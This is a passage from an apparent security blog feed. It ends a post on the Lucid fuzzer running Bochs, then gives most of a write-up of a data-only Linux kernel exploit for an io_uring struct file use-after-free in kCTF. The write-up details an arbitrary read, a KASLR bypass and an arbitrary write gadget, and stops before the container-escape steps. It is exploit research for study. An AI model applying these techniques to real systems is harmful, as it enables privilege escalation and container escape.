<span class="gp">[17:43:19] lucid&gt;</span><span class="w"> </span>Bochs loaded <span class="o">{</span> Entry: 0x19F50, RSP: 0x7F513F11C000 <span class="o">}</span>
<span class="go">Argument count: 3
Args:
   -./bochs
   --AAAAA
   --BBBBBBBBBB
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
Test alive!
</span><span class="gp">dude@lol:~/lucid/target/release$</span><span class="w"> 
</span></code></pre></div></div>

<p>The program runs, parses our command line args, and exits all without crashing! So it looks like everything is good to go. This would normally be a good stopping place, but I was morbidly curious…</p>

<h2 id="will-bochs-run">Will Bochs Run?</h2>
<p>We have to see right? First we have to compile Bochs as a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF which was a headache in itself, but I was able to figure it out.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">ude@lol:~/lucid/target/release$</span><span class="w"> </span>./lucid <span class="nt">--bochs-args</span> <span class="nt">-AAAAA</span> <span class="nt">-BBBBBBBBBB</span>
<span class="gp">[12:30:40] lucid&gt;</span><span class="w"> </span>Loading Bochs...
<span class="gp">[12:30:40] lucid&gt;</span><span class="w"> </span>Bochs loaded <span class="o">{</span> Entry: 0xA3DB0, RSP: 0x7FEB0F565000 <span class="o">}</span>
<span class="go">========================================================================
                        Bochs x86 Emulator 2.7
              Built from SVN snapshot on August  1, 2021
                Timestamp: Sun Aug  1 10:07:00 CEST 2021
========================================================================
Usage: bochs [flags] [bochsrc options]

  -n               no configuration file
  -f configfile    specify configuration file
  -q               quick start (skip configuration interface)
  -benchmark N     run Bochs in benchmark mode for N millions of emulated ticks
  -dumpstats N     dump Bochs stats every N millions of emulated ticks
  -r path          restore the Bochs state from path
  -log filename    specify Bochs log file name
  -unlock          unlock Bochs images leftover from previous session
  --help           display this help and exit
  --help features  display available features / devices and exit
  --help cpu       display supported CPU models and exit

For information on Bochs configuration file arguments, see the
bochsrc section in the user documentation or the man page of bochsrc.
</span><span class="gp">00000000000p[      ] &gt;</span><span class="o">&gt;</span>PANIC<span class="o">&lt;&lt;</span> <span class="no">command</span><span class="sh"> line arg '-AAAAA' was not understood
</span><span class="go">00000000000e[SIM   ] notify called, but no bxevent_callback function is registered
========================================================================
Bochs is exiting with the following message:
[      ] command line arg '-AAAAA' was not understood
========================================================================
00000000000i[SIM   ] quit_sim called with exit code 1
</span></code></pre></div></div>

<p>Bochs runs! It couldn’t make sense of our non-sense command line arguments, but we loaded it and ran it successfully.</p>

<h2 id="next-steps">Next Steps</h2>
<p>The very next step and blog post will be developing a context-switching routine that we will use to transition between Fuzzer execution and Bochs execution. This will involve saving our state each time and function basically the same way a normal user-to-kernel context switch functions.</p>

<p>After that, we have to get very familiar with Bochs and attempt to get a target up and running in vanilla Bochs. Once we do that, we’ll try to run that in the Fuzzer.</p>

<h2 id="resources">Resources</h2>
<ul>
  <li>I used this excellent blogpost from Faster Than Lime a lot when learning about how to load ELFs in memory: <a href="https://fasterthanli.me/series/making-our-own-executable-packer/part-17">https://fasterthanli.me/series/making-our-own-executable-packer/part-17</a>.</li>
  <li>Also shoutout @netspooky for helping me understand the stack layout!</li>
  <li>Thank you to ChatGPT as well, for being my sounding board (even if you failed to help me with my stack creation bugs)</li>
</ul>

<h2 id="code">Code</h2>
<p><a href="https://github.com/h0mbre/Lucid">https://github.com/h0mbre/Lucid</a></p>]]></content><author><name></name></author><category term="Fuzzing" /><category term="Fuzzer" /><category term="Development" /><category term="Emulator" /><category term="Bochs" /><summary type="html"><![CDATA[Introduction &amp;&amp; Credit to Gamozolabs For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer some utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in Nyx. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.]]></summary></entry><entry><title type="html">Escaping the Google kCTF Container with a Data-Only Exploit</title><link href="https://h0mbre.github.io/kCTF_Data_Only_Exploit/" rel="alternate" type="text/html" title="Escaping the Google kCTF Container with a Data-Only Exploit" /><published>2023-07-29T00:00:00+00:00</published><updated>2023-07-29T00:00:00+00:00</updated><id>https://h0mbre.github.io/kCTF_Data_Only_Exploit</id><content type="html" xml:base="https://h0mbre.github.io/kCTF_Data_Only_Exploit/"><![CDATA[<h2 id="introduction">Introduction</h2>
<p>I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. <code class="language-plaintext highlighter-rouge">io_ring</code> has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a <code class="language-plaintext highlighter-rouge">struct file</code> UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on <code class="language-plaintext highlighter-rouge">file</code> UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a <code class="language-plaintext highlighter-rouge">struct file</code> UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.</p>

<h2 id="the-bug">The Bug</h2>
<p>The <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=fc7222c3a9f56271fba02aabbfbae999042f1679">bug</a> is extremely simple (why can’t I find one like this?) and was exploited in <a href="https://docs.google.com/spreadsheets/d/e/2PACX-1vS1REdTA29OJftst8xN5B5x8iIUcxuK6bXdzF8G1UXCmRtoNsoQ9MbebdRdFnj6qZ0Yd7LwQfvYC2oF/pubhtml#">kCTF</a> in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by <a href="https://twitter.com/pqlqpql">pqlpql</a> and <a href="https://twitter.com/Awarau1">Awarau</a>: <a href="https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/">https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/</a>.</p>

<p>I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an <code class="language-plaintext highlighter-rouge">IORING_OP_MSG_RING</code> request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call <code class="language-plaintext highlighter-rouge">io_uring_unregister_files</code> which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.</p>

<p>What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.</p>

<h2 id="giant-shoulders">Giant Shoulders</h2>
<p>It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of <code class="language-plaintext highlighter-rouge">file</code> objects back to the page allocator by utilizing a technique called “cross-cache”. <code class="language-plaintext highlighter-rouge">file</code> structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the <code class="language-plaintext highlighter-rouge">struct file</code> size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.</p>

<p>Instead of using this trick of getting our entire victim page of <code class="language-plaintext highlighter-rouge">file</code> objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this <a href="https://org.anize.rs/HITCON-2022/pwn/fourchain-kernel">blogpost</a> by <a href="https://twitter.com/pqlqpql">@pqlpql</a> for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.</p>

<h2 id="arbitrary-read">Arbitrary Read</h2>
<p>The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the <code class="language-plaintext highlighter-rouge">fcntl</code> syscall in <code class="language-plaintext highlighter-rouge">fs/fcntl.c</code>. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an <code class="language-plaintext highlighter-rouge">fd</code> as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would <code class="language-plaintext highlighter-rouge">ctrl-f</code> for the function <code class="language-plaintext highlighter-rouge">copy_to_user</code>. This seemed like a relatively logical way to find a method of leaking data back to userspace.</p>

<p>The <code class="language-plaintext highlighter-rouge">copy_to_user</code> function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.</p>

<p>Now if you go to the <a href="https://elixir.bootlin.com/linux/v5.19/source/fs/fcntl.c">source code</a> and do the find on <code class="language-plaintext highlighter-rouge">copy_to_user</code>, the 2nd result is a snippet in this bit right here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kt">long</span> <span class="nf">fcntl_rw_hint</span><span class="p">(</span><span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">file</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">cmd</span><span class="p">,</span>
			  <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">arg</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="n">inode</span> <span class="o">=</span> <span class="n">file_inode</span><span class="p">(</span><span class="n">file</span><span class="p">);</span>
	<span class="n">u64</span> <span class="n">__user</span> <span class="o">*</span><span class="n">argp</span> <span class="o">=</span> <span class="p">(</span><span class="n">u64</span> <span class="n">__user</span> <span class="o">*</span><span class="p">)</span><span class="n">arg</span><span class="p">;</span>
	<span class="k">enum</span> <span class="n">rw_hint</span> <span class="n">hint</span><span class="p">;</span>
	<span class="n">u64</span> <span class="n">h</span><span class="p">;</span>

	<span class="k">switch</span> <span class="p">(</span><span class="n">cmd</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">case</span> <span class="n">F_GET_RW_HINT</span><span class="p">:</span>
		<span class="n">h</span> <span class="o">=</span> <span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_write_hint</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_to_user</span><span class="p">(</span><span class="n">argp</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">h</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="o">*</span><span class="n">argp</span><span class="p">)))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">case</span> <span class="n">F_SET_RW_HINT</span><span class="p">:</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span><span class="o">&amp;</span><span class="n">h</span><span class="p">,</span> <span class="n">argp</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">h</span><span class="p">)))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
		<span class="n">hint</span> <span class="o">=</span> <span class="p">(</span><span class="k">enum</span> <span class="n">rw_hint</span><span class="p">)</span> <span class="n">h</span><span class="p">;</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">rw_hint_valid</span><span class="p">(</span><span class="n">hint</span><span class="p">))</span>
			<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>

		<span class="n">inode_lock</span><span class="p">(</span><span class="n">inode</span><span class="p">);</span>
		<span class="n">inode</span><span class="o">-&gt;</span><span class="n">i_write_hint</span> <span class="o">=</span> <span class="n">hint</span><span class="p">;</span>
		<span class="n">inode_unlock</span><span class="p">(</span><span class="n">inode</span><span class="p">);</span>
		<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
	<span class="nl">default:</span>
		<span class="k">return</span> <span class="o">-</span><span class="n">EINVAL</span><span class="p">;</span>
	<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>You can see that in the <code class="language-plaintext highlighter-rouge">F_GET_RW_HINT</code> case, a <code class="language-plaintext highlighter-rouge">u64</code> (“h”), is copied back to userspace. That value comes from the value of <code class="language-plaintext highlighter-rouge">inode-&gt;i_write_hint</code>. And <code class="language-plaintext highlighter-rouge">inode</code> itself is returned from <code class="language-plaintext highlighter-rouge">file_inode(file)</code>. The source code for that function is as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="k">struct</span> <span class="n">inode</span> <span class="o">*</span><span class="nf">file_inode</span><span class="p">(</span><span class="k">const</span> <span class="k">struct</span> <span class="n">file</span> <span class="o">*</span><span class="n">f</span><span class="p">)</span>
<span class="p">{</span>
	<span class="k">return</span> <span class="n">f</span><span class="o">-&gt;</span><span class="n">f_inode</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Lol, well then. If we control the <code class="language-plaintext highlighter-rouge">file</code>, then we control the <code class="language-plaintext highlighter-rouge">inode</code> as well. A <code class="language-plaintext highlighter-rouge">struct file</code> looks like this:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">file</span> <span class="p">{</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">struct</span> <span class="n">llist_node</span>	<span class="n">fu_llist</span><span class="p">;</span>
		<span class="k">struct</span> <span class="n">rcu_head</span> 	<span class="n">fu_rcuhead</span><span class="p">;</span>
	<span class="p">}</span> <span class="n">f_u</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">path</span>		<span class="n">f_path</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">inode</span>		<span class="o">*</span><span class="n">f_inode</span><span class="p">;</span>	<span class="cm">/* cached value */</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>

<p>And since we’re using the pipe buffer as our replacement object (really the entire page), we can set <code class="language-plaintext highlighter-rouge">inode</code> to be an arbitrary address. Let’s go check out the <code class="language-plaintext highlighter-rouge">inode</code> struct and see what we can learn about this <code class="language-plaintext highlighter-rouge">i_write_hint</code> member.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">inode</span> <span class="p">{</span>
	<span class="n">umode_t</span>			<span class="n">i_mode</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>		<span class="n">i_opflags</span><span class="p">;</span>
	<span class="n">kuid_t</span>			<span class="n">i_uid</span><span class="p">;</span>
	<span class="n">kgid_t</span>			<span class="n">i_gid</span><span class="p">;</span>
	<span class="kt">unsigned</span> <span class="kt">int</span>		<span class="n">i_flags</span><span class="p">;</span>

<span class="cp">#ifdef CONFIG_FS_POSIX_ACL
</span>	<span class="k">struct</span> <span class="n">posix_acl</span>	<span class="o">*</span><span class="n">i_acl</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">posix_acl</span>	<span class="o">*</span><span class="n">i_default_acl</span><span class="p">;</span>
<span class="cp">#endif
</span>
	<span class="k">const</span> <span class="k">struct</span> <span class="n">inode_operations</span>	<span class="o">*</span><span class="n">i_op</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">super_block</span>	<span class="o">*</span><span class="n">i_sb</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">address_space</span>	<span class="o">*</span><span class="n">i_mapping</span><span class="p">;</span>

<span class="cp">#ifdef CONFIG_SECURITY
</span>	<span class="kt">void</span>			<span class="o">*</span><span class="n">i_security</span><span class="p">;</span>
<span class="cp">#endif
</span>
	<span class="cm">/* Stat data, not accessed from path walking */</span>
	<span class="kt">unsigned</span> <span class="kt">long</span>		<span class="n">i_ino</span><span class="p">;</span>
	<span class="cm">/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */</span>
	<span class="k">union</span> <span class="p">{</span>
		<span class="k">const</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">i_nlink</span><span class="p">;</span>
		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">__i_nlink</span><span class="p">;</span>
	<span class="p">};</span>
	<span class="n">dev_t</span>			<span class="n">i_rdev</span><span class="p">;</span>
	<span class="n">loff_t</span>			<span class="n">i_size</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_atime</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_mtime</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">timespec64</span>	<span class="n">i_ctime</span><span class="p">;</span>
	<span class="n">spinlock_t</span>		<span class="n">i_lock</span><span class="p">;</span>	<span class="cm">/* i_blocks, i_bytes, maybe i_size */</span>
	<span class="kt">unsigned</span> <span class="kt">short</span>          <span class="n">i_bytes</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">i_blkbits</span><span class="p">;</span>
	<span class="n">u8</span>			<span class="n">i_write_hint</span><span class="p">;</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>
<p>So <code class="language-plaintext highlighter-rouge">i_write_hint</code> is a <code class="language-plaintext highlighter-rouge">u8</code>, aka, a single byte. This is perfect for what we need, <code class="language-plaintext highlighter-rouge">inode</code> becomes the address from which we read a byte back to userland (plus the offset to the member).</p>

<p>Since we control 100% of the backing data of the <code class="language-plaintext highlighter-rouge">file</code>, we thus control the value of the <code class="language-plaintext highlighter-rouge">inode</code> member. So if we set up a fake <code class="language-plaintext highlighter-rouge">file</code> struct in memory via our pipe buffer and have the <code class="language-plaintext highlighter-rouge">inode</code> member be <code class="language-plaintext highlighter-rouge">0x1337</code>, the kernel will try to deref <code class="language-plaintext highlighter-rouge">0x1337</code> as an address and then read a byte at the offset of the <code class="language-plaintext highlighter-rouge">i_write_hint</code> member. So this is an arbitrary read for us, and we found it in the dumbest way possible.</p>

<p>This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?</p>

<h2 id="finding-a-read-target">Finding a Read Target</h2>
<p>So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the <code class="language-plaintext highlighter-rouge">file</code> UAF, but also vaguely from <a href="https://twitter.com/ky1ebot">@ky1ebot</a> tweets like <a href="https://twitter.com/ky1ebot/status/1601231194062192640?s=20">this one</a>.</p>

<p><code class="language-plaintext highlighter-rouge">cpu_entry_area</code> is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of <a href="https://docs.kernel.org/next/x86/kernel-stacks.html">Interrupt Stacks</a> in the kernel that can be used in the event that an exception must be handled for instance.</p>

<p>After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> consistently and that was an address inside the <code class="language-plaintext highlighter-rouge">error_entry</code> function which is as follows:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">SYM_CODE_START_LOCAL</span><span class="p">(</span><span class="n">error_entry</span><span class="p">)</span>
	<span class="n">UNWIND_HINT_FUNC</span>

	<span class="n">PUSH_AND_CLEAR_REGS</span> <span class="n">save_ret</span><span class="o">=</span><span class="mi">1</span>
	<span class="n">ENCODE_FRAME_POINTER</span> <span class="mi">8</span>

	<span class="n">testb</span>	<span class="err">$</span><span class="mi">3</span><span class="p">,</span> <span class="n">CS</span><span class="o">+</span><span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rsp</span><span class="p">)</span>
	<span class="n">jz</span>	<span class="p">.</span><span class="n">Lerror_kernelspace</span>

	<span class="cm">/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */</span>
	<span class="n">swapgs</span>
	<span class="n">FENCE_SWAPGS_USER_ENTRY</span>
	<span class="cm">/* We have user CR3.  Change to kernel CR3. */</span>
	<span class="n">SWITCH_TO_KERNEL_CR3</span> <span class="n">scratch_reg</span><span class="o">=%</span><span class="n">rax</span>
	<span class="n">IBRS_ENTER</span>
	<span class="n">UNTRAIN_RET</span>

	<span class="n">leaq</span>	<span class="mi">8</span><span class="p">(</span><span class="o">%</span><span class="n">rsp</span><span class="p">),</span> <span class="o">%</span><span class="n">rdi</span>			<span class="cm">/* arg0 = pt_regs pointer */</span>
<span class="p">.</span><span class="n">Lerror_entry_from_usermode_after_swapgs</span><span class="o">:</span>

	<span class="cm">/* Put us onto the real thread stack. */</span>
	<span class="n">call</span>	<span class="n">sync_regs</span>
	<span class="n">RET</span>
<span class="o">&lt;</span><span class="n">SNIP</span><span class="o">&gt;</span>
</code></pre></div></div>

<p><code class="language-plaintext highlighter-rouge">error_entry</code> seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code>. The address was the address of the <code class="language-plaintext highlighter-rouge">call sync_regs</code> portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the <code class="language-plaintext highlighter-rouge">call</code> was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.</p>

<p>Again, this portion didn’t take very long to figure out because I had just been introduced to <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> by the aforementioned blogposts at the time.</p>

<h2 id="where-are-the-write-gadgets">Where are the Write Gadgets?</h2>
<p>I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an <code class="language-plaintext highlighter-rouge">fd</code> as an argument and tracing through them looking for calls to <code class="language-plaintext highlighter-rouge">copy_to_user</code>, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend <a href="https://twitter.com/Firzen14">@Firzen14</a> and he brought up this concept here: <a href="https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9">https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9</a>. In the P0 blogpost, they talk about how the <code class="language-plaintext highlighter-rouge">signalfd_ctx</code> of a <code class="language-plaintext highlighter-rouge">signalfd</code> file is stored in the <code class="language-plaintext highlighter-rouge">f.file-&gt;private_data</code> field and how the <code class="language-plaintext highlighter-rouge">signalfd</code> syscalls allows the attacker to perform a write of the <code class="language-plaintext highlighter-rouge">ctx-&gt;sigmask</code>. So in our situation, since we control the entire fake file contents, forging a fake <code class="language-plaintext highlighter-rouge">signalfd_ctx</code> in memory would be quite easy since we have access to an entire page of memory.</p>

<p>I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the <code class="language-plaintext highlighter-rouge">private_data</code> field of our <code class="language-plaintext highlighter-rouge">struct file</code>. So at this point, I went hunting for usages of <code class="language-plaintext highlighter-rouge">private_data</code> in the kernel code base. As you can see, the member is used in many many places: <a href="https://elixir.bootlin.com/linux/latest/C/ident/private_data">https://elixir.bootlin.com/linux/latest/C/ident/private_data</a>.</p>

<p>This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at <code class="language-plaintext highlighter-rouge">io_uring</code> itself.</p>

<p>Looking for instances where the <code class="language-plaintext highlighter-rouge">file-&gt;private_data</code> was used, I quickly found an instance right in the very function that was related to the bug. In <a href="https://elixir.bootlin.com/linux/v5.19/source/fs/io_uring.c#L5244"><code class="language-plaintext highlighter-rouge">io_msg_ring</code></a>, you can see that a <code class="language-plaintext highlighter-rouge">target_ctx</code> of type <code class="language-plaintext highlighter-rouge">io_ring_ctx</code> is derived from the <code class="language-plaintext highlighter-rouge">req-&gt;file-&gt;private</code> data. Since we control the fake <code class="language-plaintext highlighter-rouge">file</code>, we control can control the <code class="language-plaintext highlighter-rouge">private_data</code> contents (a pointer to a fake <code class="language-plaintext highlighter-rouge">io_ring_ctx</code> in this case).</p>

<p><code class="language-plaintext highlighter-rouge">io_msg_ring</code> is used to pass data from one io ring to another, and you can see that in <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code>, we actually retrieve a <code class="language-plaintext highlighter-rouge">io_uring_cqe</code> struct from our potentially faked <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> via <code class="language-plaintext highlighter-rouge">io_get_cqe</code>. Immediately, we see several <code class="language-plaintext highlighter-rouge">WRITE_ONCE</code> macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur, didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.</p>

<p>Immediately after the call to <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code>, there is one to <code class="language-plaintext highlighter-rouge">io_commit_cqring</code> using our faked <code class="language-plaintext highlighter-rouge">io_uring_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">io_commit_cqring</span><span class="p">(</span><span class="k">struct</span> <span class="n">io_ring_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
	<span class="cm">/* order cqe stores with ring update */</span>
	<span class="n">smp_store_release</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">rings</span><span class="o">-&gt;</span><span class="n">cq</span><span class="p">.</span><span class="n">tail</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">cached_cq_tail</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This is basically a <code class="language-plaintext highlighter-rouge">memcpy</code>, we write the contents of <code class="language-plaintext highlighter-rouge">ctx-&gt;cached_cq_tail</code> (100% user-controlled) to <code class="language-plaintext highlighter-rouge">&amp;ctx-&gt;ring-&gt;cq.tail</code> (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.</p>

<h2 id="exploitation-plan">Exploitation Plan</h2>
<p>Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.</p>

<p>I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. <a href="https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation">This post from Cyberark</a> was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s <a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">blog post</a> on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.</p>

<h3 id="finding-init">Finding Init</h3>
